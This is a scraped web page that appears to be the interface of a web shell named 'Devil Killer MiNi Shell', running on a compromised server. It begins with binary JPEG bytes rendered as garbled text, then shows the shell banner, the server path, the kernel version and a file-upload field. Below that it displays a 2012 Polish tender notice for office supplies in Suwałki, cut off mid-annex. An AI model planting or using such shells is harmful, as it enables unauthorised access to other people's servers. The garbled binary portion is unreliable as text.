JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120203/33668-N-2012.html

<p class="kh_header"><b>Suwałki: Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach.</b><br>
<b>Numer ogłoszenia: 33668 - 2012; data zamieszczenia: 03.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Edukacji Nauczycieli , ul. M. Reja 67B, 16-400 Suwałki, woj. podlaskie, tel. 87 5670328, faks 87 5657858.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cen.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I zawiera pozycje od 1 do 97: poz. 1 Papier ksero A4 biały (1 ryza 500 kartek), poz. 2 Papier do drukarek biały (CIE 161) format A4 (1 ryza 500 kartek), poz. 3 Papier ksero A4 kolorowy (kolory pastelowe) (1 ryza 500 kartek), poz. 4 Papier ksero A4 kolorowy (kolory intensywne) (1 ryza 500 kartek), poz. 5 Papier ksero A4 kolor mix (1 ryza 250 kartek), poz. 6 Papier ksero A4 kolor mix (1 ryza 100 kartek), poz. 7 Papier ksero A4 biały satynowy (1 ryza 250 kartek), poz. 8 Papier ksero A3 biały (1 ryza 500 kartek), poz. 9 Papier pakowy szary 100x126cm, poz. 10 Blok do tablic flipchart (50 kartkowy), poz. 11 Blok do tablic flipchart (20-25 kartkowy), poz. 12 Zeszyt brulion A4 (96 kart.), poz. 13 Zeszyt brulion B5 (160 kart.), poz. 14 Zeszyt A5 ( 32 kart.), poz. 15 Zeszyt A5 (60 kart.), poz. 16 Skorowidz A5 (96 kart.), poz.17 Blok techniczny biały A4 (10 kart.), poz. 18 Blok techniczny kolorowy A4 (10 kart.), poz. 19 Karton różnokolorowy format A1 gramatura 200g, poz. 20 Memostik 7,6 × 7,6 cm (100 kartek), poz. 21 Memostik 7,6 × 5,1 cm (100 kartek), poz. 22 Memostik 5,1 × 3,8 cm (100 kartek), poz. 23 Memostik neo kolor 7,6x7,6 cm z klejem (450 kart.), poz. 24 Memostik 7,6 × 12,5 cm z klejem (100 kart.), poz. 25 Kostka bez kleju 8,3 × 8,3 cm (400 kartek), poz. 26 Etykieta samoprzylepna cenowa okrągła w rolce,  poz. 27 Koperty C6 białe samoprzylepne (1000 sztuk), poz. 28 Koperty C5 białe samoprzylepne (500 sztuk), poz. 29 Koperty B4 białe samoprzylepne (250 sztuk), poz. 30  Koperty B4 brązowe samoprzylepne (250 sztuk), poz. 31 Koperty B4  brązowe z rozszerzonymi bokami i spodem, samoprzylepne z paskiem (250 sztuk), poz. 32 Skoroszyty A4 zwykłe białe kartonowe (50 sztuk), poz. 33 Teczki wiązane A4 białe (50 sztuk), poz. 34 Etykiety samoprzylepne A4 białe (100 sztuk), poz. 35 Kieszenie otwierane z góry groszkowe z polipropylenu A4 (100 sztuk), poz. 36 Obwoluty z klapą polipropylenu A4 (10 sztuk), poz. 37 Kieszenie otwierane z góry krystaliczne z polipropylenu A4 (100 sztuk), poz. 38 Ofertówki A4, gr. 0,15 (25 sztuk), poz. 39 Identyfikator z klipsem i agrafką, poz. 40 Skoroszyty plastik z przezroczystą okładką A4, poz. 41 Skoroszyty plastik z zawieszką do segregatorów A4, poz. 42 Teczki skrzydłowe A4 zamykane gumką albo rzepem, grzbiet 3 cm, poz. 43 Teczki skrzydłowe A4 zamykane gumką albo rzepem, grzbiet 1,5 cm, poz. 44 Segregator A4 z mechanizmem (75 mm), poz. 45 Segregator A4 z mechanizmem (45 mm), poz. 46 Segregator A4 z 2 kółkami (25 - 35 mm), poz. 47 Długopisy z nadrukiem logo CEN, poz. 48 Markery ścięte (różne kolory), poz. 49 Markery do pisania na płytach CD-DVD (kolor czarny), poz. 50 Mazaki do pisania na folii (różne kolory), poz. 51 Korektor biały w długopisie, poz. 52 Długopis przylepny na łańcuszku, poz. 53 Ołówki szkolne, poz. 54 Cienkopisy kulkowe kolorowe, poz. 55 Zakreślacze różnokolorowe, poz. 56 Długopisy żelowe kolorowe, poz. 57 Kredki ołówkowe, poz. 58 Zszywki do kopiarki Olivetti d-Copia 500 (opakowanie 15 tys. szt.), poz. 59 Spinacze okrągłe 50mm, poz. 60 Spinacze okrągłe metalowe 28mm, poz. 61 Klips do papieru (rozmiar 25), poz. 62 Klips do papieru (rozmiar 32), poz. 63 Pinezki z kolorowymi łebkami, poz. 64 Nożyczki biurowe, poz. 65 Temperówki, poz. 66 Gumki, poz. 67 Linijki plastikowe przezroczyste 20 cm, poz. 68 Klej biurowy w sztyfcie, poz. 69 Taśma pakowa klejąca przezroczysta szeroka, poz. 70 Taśma pakowa klejąca dwustronna szeroka, poz. 71 Taśma klejąca wąska (2cm) przezroczysta, poz. 72 Taśma malarska maskująca kremowo-żółta jednostronnie klejąca (2 cm),  poz. 73 Folia termotransferowa do faxu (2 sztuki w op.), poz. 74 Kasetony archiwizacyjne kartonowe z twardej falistej tektury, zamykane, do czasopism (37x7,5x27), poz. 75 Kasetony archiwizacyjne kartonowe z twardej falistej tektury, częściowo odkryte, do czasopism (37x7,5x27), poz. 76 Krepina kolorowa (marszczona) 50x200, poz. 77 Zszywacz, poz. 78 Dziurkacz, poz. 79 Wkłady atramentowe krótkie, poz. 80 Wkłady atramentowe długie, poz. 81 Koperty bezpieczne B-4p, wymiar wewnętrzny nie mniej niż 255x375 mm, poz. 82 Ofertówki krystaliczne format A-5 (w op. po 25 szt.), poz. 83 Grzbiet wsuwany do dokumentów  A4 20-30 kart, poz. 84 Grzbiet wsuwany do dokumentów  A4 40-60 kart, poz. 85 Tusz do stempli (czerwony, czarny), poz. 86 Masa klejąca typu Blu Tack (biała i niebieska), poz. 87 Poduszka do pieczęci, poz. 88 Flamastry kolorowe w kompletach po 24 kolory, poz. 89 Dziurkacz ozdobny, poz. 90 Druciki kreatywne, poz. 91 Ruchome oczka, poz. 92 Balony długie do modelowania, poz. 93 Kule styropianowe, poz. 94 Karton z falistą fakturą, poz. 95 Płyty CD-R, poz. 96 Płyty DVD, poz. 97 Koperty do płytek CD.
CZĘŚĆ II zawiera pozycje od 98 do 100: poz. 98 Papier toaletowy do dozowników, poz. 99 Ręczniki wsadowe do dozowników, poz. 100 Ręczniki papierowe do rąk.
CZĘŚĆ III zawiera pozycje od 101 do 102: poz. 101 Toner do kopiarki Olivetti d-Copia 500, poz. 102 Toner do kopiarki cyfrowej SHARP.  
CZĘŚĆ IV zawiera pozycje od 103 do 111: poz. 103 Toner do drukarki HP LJ 1150, poz. 104 Toner do drukarki HP LJ 1160, poz. 105 Toner do drukarki OKI C 3400 czarny, poz. 106 Toner do drukarki OKI C 3400 kolor cyan, poz. 107 Toner do drukarki OKI C 3400 kolor yellow, poz. 108 Toner do drukarki OKI C 3400 kolor magenta, poz. 109 Toner do drukarki HP LJ 3020, HP LJ 1020 i HP LJ 1022, poz.110 Toner do drukarki HP LJ P1005 czarny, poz. 111 Toner do drukarki HP LJ 1200.
CZĘŚĆ V zawiera pozycję 112: Papier do drukarek biały (CIE 161) format A4 (1 ryza 500 kartek). 
CZĘŚĆ VI zawiera pozycję 113: Toner do drukarki HP LJ 1160..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1, 30.19.92.30-1, 22.81.50.00-6, 22.81.63.00-6, 30.19.20.00-1, 30.19.12.10-5, 30.19.21.25-3, 30.14.11.00-0, 33.76.00.00-5, 30.12.51.20-8, 30.12.51.10-5, 21.12.20.00-4, 22.85.10.00-0, 30.19.28.00-9, 30.19.95.00-5, 30.19.21.30-1, 30.19.23.10-7, 30.19.21.00-2, 30.12.44.00-8, 22.99.34.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość:
1)	zmiany ilości poszczególnych pozycji zamówienia (zwiększenia lub zmniejszenia) w częściach od I do IV. W takim przypadku ulegnie zmianie wysokość wynagrodzenia określona w umowie, 
2)	wprowadzenia nowego asortymentu. Cena nowego asortymentu zostanie uzgodniona w odrębnych negocjacjach. W takim przypadku ulegnie zmianie wynagrodzenie określone w umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cen.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Edukacji Nauczycieli w Suwałkach, ul. Mikołaja Reja 67 B, 16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2012 godzina 10:00, miejsce: Centrum Edukacji Nauczycieli w Suwałkach, ul. Mikołaja Reja 67 B, 16-400 Suwałki, sekretariat, piętro I, pokój nr 113..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie publiczne (część V i VI) dotyczy projektu Centrum Edukacji Nauczycieli w Suwałkach ul. Mikołaja Reja 67 B, 16-400 Suwałki - pt. ICT w nauczaniu przedmiotów matematycznych i przyrodniczych w gimnazjach. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytetu III Wysoka jakość systemu oświaty,  Działanie 3.3 Poprawa jakości kształcenia,  Poddziałanie 3.3.4 Modyfikacja treści i metod kształcenia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I zawiera pozycje od 1 do 97: poz. 1 Papier ksero A4 biały (1 ryza 500 kartek), poz. 2 Papier do drukarek biały (CIE 161) format A4 (1 ryza 500 kartek), poz. 3 Papier ksero A4 kolorowy (kolory pastelowe) (1 ryza 500 kartek), poz. 4 Papier ksero A4 kolorowy (kolory intensywne) (1 ryza 500 kartek), poz. 5 Papier ksero A4 kolor mix (1 ryza 250 kartek), poz. 6 Papier ksero A4 kolor mix (1 ryza 100 kartek), poz. 7 Papier ksero A4 biały satynowy (1 ryza 250 kartek), poz. 8 Papier ksero A3 biały (1 ryza 500 kartek), poz. 9 Papier pakowy szary 100x126cm, poz. 10 Blok do tablic flipchart (50 kartkowy), poz. 11 Blok do tablic flipchart (20-25 kartkowy), poz. 12 Zeszyt brulion A4 (96 kart.), poz. 13 Zeszyt brulion B5 (160 kart.), poz. 14 Zeszyt A5 ( 32 kart.), poz. 15 Zeszyt A5 (60 kart.), poz. 16 Skorowidz A5 (96 kart.), poz.17 Blok techniczny biały A4 (10 kart.), poz. 18 Blok techniczny kolorowy A4 (10 kart.), poz. 19 Karton różnokolorowy format A1 gramatura 200g, poz. 20 Memostik 7,6 × 7,6 cm (100 kartek), poz. 21 Memostik 7,6 × 5,1 cm (100 kartek), poz. 22 Memostik 5,1 × 3,8 cm (100 kartek), poz. 23 Memostik neo kolor 7,6x7,6 cm z klejem (450 kart.), poz. 24 Memostik 7,6 × 12,5 cm z klejem (100 kart.), poz. 25 Kostka bez kleju 8,3 × 8,3 cm (400 kartek), poz. 26 Etykieta samoprzylepna cenowa okrągła w rolce,  poz. 27 Koperty C6 białe samoprzylepne (1000 sztuk), poz. 28 Koperty C5 białe samoprzylepne (500 sztuk), poz. 29 Koperty B4 białe samoprzylepne (250 sztuk), poz. 30  Koperty B4 brązowe samoprzylepne (250 sztuk), poz. 31 Koperty B4  brązowe z rozszerzonymi bokami i spodem, samoprzylepne z paskiem (250 sztuk), poz. 32 Skoroszyty A4 zwykłe białe kartonowe (50 sztuk), poz. 33 Teczki wiązane A4 białe (50 sztuk), poz. 34 Etykiety samoprzylepne A4 białe (100 sztuk), poz. 35 Kieszenie otwierane z góry groszkowe z polipropylenu A4 (100 sztuk), poz. 36 Obwoluty z klapą polipropylenu A4 (10 sztuk), poz. 37 Kieszenie otwierane z góry krystaliczne z polipropylenu A4 (100 sztuk), poz. 38 Ofertówki A4, gr. 0,15 (25 sztuk), poz. 39 Identyfikator z klipsem i agrafką, poz. 40 Skoroszyty plastik z przezroczystą okładką A4, poz. 41 Skoroszyty plastik z zawieszką do segregatorów A4, poz. 42 Teczki skrzydłowe A4 zamykane gumką albo rzepem, grzbiet 3 cm, poz. 43 Teczki skrzydłowe A4 zamykane gumką albo rzepem, grzbiet 1,5 cm, poz. 44 Segregator A4 z mechanizmem (75 mm), poz. 45 Segregator A4 z mechanizmem (45 mm), poz. 46 Segregator A4 z 2 kółkami (25 - 35 mm), poz. 47 Długopisy z nadrukiem logo CEN, poz. 48 Markery ścięte (różne kolory), poz. 49 Markery do pisania na płytach CD-DVD (kolor czarny), poz. 50 Mazaki do pisania na folii (różne kolory), poz. 51 Korektor biały w długopisie, poz. 52 Długopis przylepny na łańcuszku, poz. 53 Ołówki szkolne, poz. 54 Cienkopisy kulkowe kolorowe, poz. 55 Zakreślacze różnokolorowe, poz. 56 Długopisy żelowe kolorowe, poz. 57 Kredki ołówkowe, poz. 58 Zszywki do kopiarki Olivetti d-Copia 500 (opakowanie 15 tys. szt.), poz. 59 Spinacze okrągłe 50mm, poz. 60 Spinacze okrągłe metalowe 28mm, poz. 61 Klips do papieru (rozmiar 25), poz. 62 Klips do papieru (rozmiar 32), poz. 63 Pinezki z kolorowymi łebkami, poz. 64 Nożyczki biurowe, poz. 65 Temperówki, poz. 66 Gumki, poz. 67 Linijki plastikowe przezroczyste 20 cm, poz. 68 Klej biurowy w sztyfcie, poz. 69 Taśma pakowa klejąca przezroczysta szeroka, poz. 70 Taśma pakowa klejąca dwustronna szeroka, poz. 71 Taśma klejąca wąska (2cm) przezroczysta, poz. 72 Taśma malarska maskująca kremowo-żółta jednostronnie klejąca (2 cm),  poz. 73 Folia termotransferowa do faxu (2 sztuki w op.), poz. 74 Kasetony archiwizacyjne kartonowe z twardej falistej tektury, zamykane, do czasopism (37x7,5x27), poz. 75 Kasetony archiwizacyjne kartonowe z twardej falistej tektury, częściowo odkryte, do czasopism (37x7,5x27), poz. 76 Krepina kolorowa (marszczona) 50x200, poz. 77 Zszywacz, poz. 78 Dziurkacz, poz. 79 Wkłady atramentowe krótkie, poz. 80 Wkłady atramentowe długie, poz. 81 Koperty bezpieczne B-4p, wymiar wewnętrzny nie mniej niż 255x375 mm, poz. 82 Ofertówki krystaliczne format A-5 (w op. po 25 szt.), poz. 83 Grzbiet wsuwany do dokumentów  A4 20-30 kart, poz. 84 Grzbiet wsuwany do dokumentów  A4 40-60 kart, poz. 85 Tusz do stempli (czerwony, czarny), poz. 86 Masa klejąca typu Blu Tack (biała i niebieska), poz. 87 Poduszka do pieczęci, poz. 88 Flamastry kolorowe w kompletach po 24 kolory, poz. 89 Dziurkacz ozdobny, poz. 90 Druciki kreatywne, poz. 91 Ruchome oczka, poz. 92 Balony długie do modelowania, poz. 93 Kule styropianowe, poz. 94 Karton z falistą fakturą, poz. 95 Płyty CD-R, poz. 96 Płyty DVD, poz. 97 Koperty do płytek CD..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 22.81.60.00-3, 22.81.50.00-6, 22.81.63.00-6, 30.19.28.00-9, 30.19.92.30-1, 22.85.10.00-0, 30.19.20.00-1, 30.19.95.00-5, 30.19.21.25-3, 30.19.21.60-0, 30.19.12.10-5, 30.19.21.30-1, 30.12.44.00-8, 30.19.21.00-2, 30.19.23.40-6, 30.19.73.20-5, 30.19.92.30-1, 30.19.21.00-2, 22.81.60.00-3, 30.23.43.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II zawiera pozycje od 98 do 100: poz. 98 Papier toaletowy do dozowników, poz. 99 Ręczniki wsadowe do dozowników, poz. 100 Ręczniki papierowe do rąk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III zawiera pozycje od 101 do 102: poz. 101 Toner do kopiarki Olivetti d-Copia 500, poz. 102 Toner do kopiarki cyfrowej SHARP..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa wyrobów z papieru i materiałów biurowych do Centrum Edukacji Nauczycieli w Suwałkach..</p>
